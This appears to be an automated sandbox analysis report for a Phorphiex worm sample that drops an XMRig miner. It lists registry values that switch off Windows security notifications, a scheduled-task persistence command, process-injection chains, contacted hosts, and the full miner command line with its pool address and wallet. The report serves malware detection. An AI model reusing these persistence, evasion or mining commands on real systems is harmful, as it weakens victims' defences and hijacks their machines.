Malware Analysis Report

2024-11-13 15:39

Sample ID 220812-tcxyxahdc8
Target c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
SHA256 c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
Tags
phorphiex xmrig evasion loader miner persistence trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d

Threat Level: Known bad

The file c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d was found to be: Known bad.

Malicious Activity Summary

phorphiex xmrig evasion loader miner persistence trojan worm

Phorphiex family

xmrig

Windows security bypass

Phorphiex

XMRig Miner payload

Executes dropped EXE

Downloads MZ/PE file

Windows security modification

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-12 15:55

Signatures

Phorphiex family

phorphiex

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-12 15:55

Reported

2022-08-12 15:57

Platform

win10-20220722-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"

Signatures

Phorphiex

worm trojan loader phorphiex

Windows security bypass

evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |

xmrig

miner xmrig

XMRig Miner payload

miner
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |

Downloads MZ/PE file

Windows security modification

evasion trojan
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |

Adds Run key to start application

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wcdsemgr.exe" | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |

Suspicious use of SetThreadContext

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 220 set thread context of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |

Drops file in Windows directory

| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File created | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
| File opened for modification | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |

Creates scheduled task(s)

persistence
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |

Suspicious behavior: LoadsDriver

| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 4956 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | C:\Windows\wklopsvcs.exe |
| PID 4956 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | C:\Windows\wklopsvcs.exe |
| PID 4956 wrote to memory of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | C:\Windows\wklopsvcs.exe |
| PID 1868 wrote to memory of 3416 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\612732430.exe |
| PID 1868 wrote to memory of 3416 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\612732430.exe |
| PID 1868 wrote to memory of 3416 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\612732430.exe |
| PID 1868 wrote to memory of 3148 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\1740120124.exe |
| PID 1868 wrote to memory of 3148 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\1740120124.exe |
| PID 1868 wrote to memory of 3148 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\1740120124.exe |
| PID 1868 wrote to memory of 4476 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe |
| PID 1868 wrote to memory of 4476 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe |
| PID 1868 wrote to memory of 4476 | N/A | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe |
| PID 4476 wrote to memory of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\516319480.exe | C:\Windows\wcdsemgr.exe |
| PID 4476 wrote to memory of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\516319480.exe | C:\Windows\wcdsemgr.exe |
| PID 4476 wrote to memory of 2016 | N/A | C:\Users\Admin\AppData\Local\Temp\516319480.exe | C:\Windows\wcdsemgr.exe |
| PID 2016 wrote to memory of 4912 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\1533620072.exe |
| PID 2016 wrote to memory of 4912 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\1533620072.exe |
| PID 2016 wrote to memory of 4912 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\1533620072.exe |
| PID 2016 wrote to memory of 2480 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\47587152.exe |
| PID 2016 wrote to memory of 2480 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\47587152.exe |
| PID 2016 wrote to memory of 2480 | N/A | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\47587152.exe |
| PID 3148 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\1740120124.exe | C:\Users\Admin\AppData\Local\Temp\2314210268.exe |
| PID 3148 wrote to memory of 1908 | N/A | C:\Users\Admin\AppData\Local\Temp\1740120124.exe | C:\Users\Admin\AppData\Local\Temp\2314210268.exe |
| PID 1908 wrote to memory of 4644 | N/A | C:\Users\Admin\AppData\Local\Temp\2314210268.exe | C:\Windows\System32\conhost.exe |
| PID 1908 wrote to memory of 4644 | N/A | C:\Users\Admin\AppData\Local\Temp\2314210268.exe | C:\Windows\System32\conhost.exe |
| PID 1908 wrote to memory of 4644 | N/A | C:\Users\Admin\AppData\Local\Temp\2314210268.exe | C:\Windows\System32\conhost.exe |
| PID 4644 wrote to memory of 4812 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\cmd.exe |
| PID 4644 wrote to memory of 4812 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\cmd.exe |
| PID 4812 wrote to memory of 1784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\schtasks.exe |
| PID 4812 wrote to memory of 1784 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\schtasks.exe |
| PID 4644 wrote to memory of 4216 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\cmd.exe |
| PID 4644 wrote to memory of 4216 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\cmd.exe |
| PID 4216 wrote to memory of 224 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\wincsvns.exe |
| PID 4216 wrote to memory of 224 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\wincsvns.exe |
| PID 224 wrote to memory of 220 | N/A | C:\Users\Admin\wincsvns.exe | C:\Windows\System32\conhost.exe |
| PID 224 wrote to memory of 220 | N/A | C:\Users\Admin\wincsvns.exe | C:\Windows\System32\conhost.exe |
| PID 224 wrote to memory of 220 | N/A | C:\Users\Admin\wincsvns.exe | C:\Windows\System32\conhost.exe |
| PID 220 wrote to memory of 4076 | N/A | C:\Windows\System32\conhost.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe |
| PID 220 wrote to memory of 4076 | N/A | C:\Windows\System32\conhost.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 220 wrote to memory of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
| PID 4076 wrote to memory of 2004 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | C:\Windows\System32\conhost.exe |
| PID 4076 wrote to memory of 2004 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | C:\Windows\System32\conhost.exe |
| PID 4076 wrote to memory of 2004 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | C:\Windows\System32\conhost.exe |

Processes

C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe

"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"

C:\Windows\wklopsvcs.exe

C:\Windows\wklopsvcs.exe

C:\Users\Admin\AppData\Local\Temp\612732430.exe

C:\Users\Admin\AppData\Local\Temp\612732430.exe

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

C:\Users\Admin\AppData\Local\Temp\516319480.exe

C:\Users\Admin\AppData\Local\Temp\516319480.exe

C:\Windows\wcdsemgr.exe

C:\Windows\wcdsemgr.exe

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

C:\Users\Admin\AppData\Local\Temp\47587152.exe

C:\Users\Admin\AppData\Local\Temp\47587152.exe

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2314210268.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\wincsvns.exe"

C:\Users\Admin\wincsvns.exe

C:\Users\Admin\wincsvns.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\wincsvns.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=185.215.113.84:8586 --user=43RrFTp7myuC9LHNDXFDm2H49Qfp5iMfbLjcbVEmKv5qdoP5vqJyKnrHixqv2QPEtW2jBjeAXzBgtjbzkNNg47Zw1DH2D2H --pass=x --cpu-max-threads-hint=40 --cinit-idle-wait=10 --cinit-idle-cpu=80

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

Network

| Country | Destination | Domain | Proto |
|---|---|---|---|
| FR | 51.11.192.48:443 | | tcp |
| US | 13.107.4.50:80 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| N/A | 10.231.50.30:40500 | | udp |
| IR | 37.255.124.89:40500 | | tcp |
| UZ | 62.209.132.199:40500 | | udp |
| EG | 154.237.114.27:40500 | | udp |
| UZ | 80.80.222.89:40500 | | udp |
| MX | 187.200.76.99:40500 | | udp |
| SY | 82.137.244.49:40500 | | udp |
| RU | 95.163.189.237:40500 | | tcp |
| GE | 178.236.57.16:40500 | | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 37.255.195.231:40500 | | udp |
| IN | 45.248.160.159:40500 | | tcp |
| IN | 117.206.43.166:40500 | | udp |
| PK | 39.53.176.26:40500 | | udp |
| IR | 151.234.138.54:40500 | | udp |
| AZ | 91.242.14.27:40500 | | udp |
| IR | 31.56.142.196:40500 | | udp |
| IR | 87.107.151.80:40500 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| DZ | 41.96.28.194:40500 | | udp |
| US | 69.67.151.23:40500 | | udp |
| UZ | 213.230.71.54:40500 | | udp |
| RU | 2.61.9.253:40500 | | udp |
| IN | 117.201.169.74:40500 | | udp |
| AO | 154.65.244.161:40500 | | tcp |
| YE | 178.130.94.154:40500 | | udp |
| RU | 185.215.113.84:8586 | | tcp |

Files

C:\Windows\wklopsvcs.exe

C:\Users\Admin\AppData\Local\Temp\612732430.exe

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

C:\Users\Admin\AppData\Local\Temp\516319480.exe

C:\Windows\wcdsemgr.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLUPZK3F\2[1]

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CNLYUSDZ\3[1]

C:\Users\Admin\tncmds.dat

C:\Users\Admin\AppData\Local\Temp\47587152.exe

C:\Users\Admin\tnnodes.dat

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

C:\Users\Admin\wincsvns.exe

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe